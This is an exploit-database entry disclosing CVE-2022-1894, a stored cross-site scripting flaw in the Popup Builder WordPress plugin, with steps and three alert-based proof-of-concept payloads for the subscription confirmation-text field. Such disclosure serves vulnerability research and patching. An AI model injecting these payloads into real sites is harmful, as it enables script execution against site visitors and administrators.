Exploit for Popup Builder < 4.1.11 - Admin+ Stored Cross-Site Scripting CVE-2022-1894

Name: Exploit for Popup Builder < 4.1.11 - Admin+ Stored Cross-Site Scripting CVE-2022-1894
Rating: 5 (71 reviews)

2022-06-20 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:68AF14EF-CA66-40D6-A1E5-09F74E2CD971
Create/edit a subscription, enabled the GDPR options in it and add the following payload in the "confirmation text" settings:

v < 4.1.10 - <script>alert(/XSS/)</script>
v <= 4.1.10:
  <input class='js-subs-submit-btn' onclick='javascript:alert(/XSS/)' type='submit' value='Subscribe' style='width:300px;height:40px;background-color:#007fe1 !important;color:#FFFFFF;border-radius:4px !important;border-width:0px !important;border-color:#007fe1 !important;text-transform:none !important;border-style:solid'/>

  <embed src='javascript:alert(/XSS/)'> (<- will only works in the backend, when updating the Popup and the confirmation text changed)

The XSS will be triggered when viewing/previewing the subscription popup (and clicking on the Subscribe button for version >= 4.1.10)